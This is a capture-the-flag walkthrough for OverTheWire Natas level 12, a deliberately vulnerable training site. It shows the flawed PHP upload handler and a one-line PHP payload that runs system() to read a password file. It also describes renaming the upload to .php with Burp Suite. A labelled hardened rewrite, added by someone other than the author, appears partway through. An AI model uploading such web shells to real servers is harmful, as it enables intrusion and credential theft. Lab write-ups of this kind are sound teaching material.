OverTheWire walkthrough: Natas level 12


Open level 12 and look at the page.


[Screenshot 01: Natas level 12, upload page]


Log in.


[Screenshot 02: Natas level 12, upload file]


There is a file upload button.


Let's try uploading a file.


[Screenshot 03: Natas level 12, upload]


Click "upload file".


[Screenshot 04: Natas level 12, upload]


An error is shown.


Upload another file.


[Screenshot 05: Natas level 12, php]


[Screenshot 06: Natas level 12, php]


The maximum file size is 1KB.


So write a small text file and try changing its extension.


<?php
system('cat /etc/natas_webpass/natas13');
?>


The system() function is used to run the command.


Look at the source code.


<?php

function genRandomString() {
    // 10 characters drawn from digits and lowercase letters (mt_rand is not a CSPRNG)
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    // Keep generating until the name is unused; the extension is used as given
    do {
        $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    // The extension is taken from the client-supplied "filename" POST field
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    // Only the size is checked; the content and extension are not
    if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>
<!-- the upload form (not reproduced in the post) is rendered here -->
<?php } ?>


The overall logic is as follows:


1. Build the file name from random digits and letters, keeping the extension from the submitted "filename" field


[Screenshot 07: Natas level 12, upload file]


2. Check the file size


[Screenshot 08: Natas level 12, upload]


3. Echo the path of the stored file


[Screenshot 09: Natas level 12, upload]
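For comparison, here is a hardened rewrite of the same handler, added here as an example and not part of the original post or the Natas source: the stored extension comes from an allowlist checked against the file's actual content, the random name uses a CSPRNG, and the server-side path is not echoed back. UPLOAD_DIR and MAX_BYTES are assumptions chosen to match the challenge.

```php
<?php
// Hardened rewrite of the Natas 12 upload handler (added example, not the
// original source). The extension is chosen from an allowlist based on the
// file's content; the client-supplied "filename" field is never used.
// UPLOAD_DIR and MAX_BYTES are assumptions matching the challenge.
const UPLOAD_DIR = "upload";
const MAX_BYTES  = 1000;
// Permitted extensions and the detected MIME type each must match.
const ALLOWED = ["jpg" => "image/jpeg", "png" => "image/png", "gif" => "image/gif"];

function genRandomString(): string {
    // CSPRNG instead of mt_rand(): the stored name cannot be predicted.
    return bin2hex(random_bytes(8));
}

function safeExtension(string $tmpFile): ?string {
    // Sniff the type from the bytes on disk, not from the user's filename.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpFile);
    $ext = array_search($mime, ALLOWED, true);
    return $ext === false ? null : $ext;
}

function handleUpload(array $file): string {
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return "No file uploaded";
    }
    if (filesize($file['tmp_name']) > MAX_BYTES) {
        return "File is too big";
    }
    $ext = safeExtension($file['tmp_name']);
    if ($ext === null) {
        return "File type not allowed";
    }
    do {
        $target = UPLOAD_DIR . "/" . genRandomString() . "." . $ext;
    } while (file_exists($target));
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return "There was an error uploading the file, please try again!";
    }
    // The server-side path is not echoed back to the client.
    return "The file has been uploaded";
}

if (isset($_FILES['uploadedfile'])) {
    echo htmlspecialchars(handleUpload($_FILES['uploadedfile']), ENT_QUOTES, 'UTF-8');
}
```

Pair this with a web-server rule that disables script execution inside the upload directory (for Apache mod_php, `php_flag engine off` in an .htaccess there), so that even a misclassified file is served as data rather than run as PHP.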


Open Burp Suite and capture the request.


[Screenshot 10: Natas level 12, php]


Prepare the file containing the cat command.


[Screenshot 11: Natas level 12, php]


Turn on interception.


[Screenshot 12: Natas level 12, php]


Upload the file.


[Screenshot 13: Natas level 12, upload file]


Modify the file name in the intercepted request.


[Screenshot 14: Natas level 12, upload file]


The upload is reported as successful.


[Screenshot 15: Natas level 12, php]


Visit the link.

Modify the name.


[Screenshot 16: Natas level 12, php]


Do it once more.

This time change the extension in the name to php.


[Screenshot 17: Natas level 12, upload]


The password is obtained.


[Screenshot 18: Natas level 12, php]

[Screenshot 19: Natas level 12, upload file]

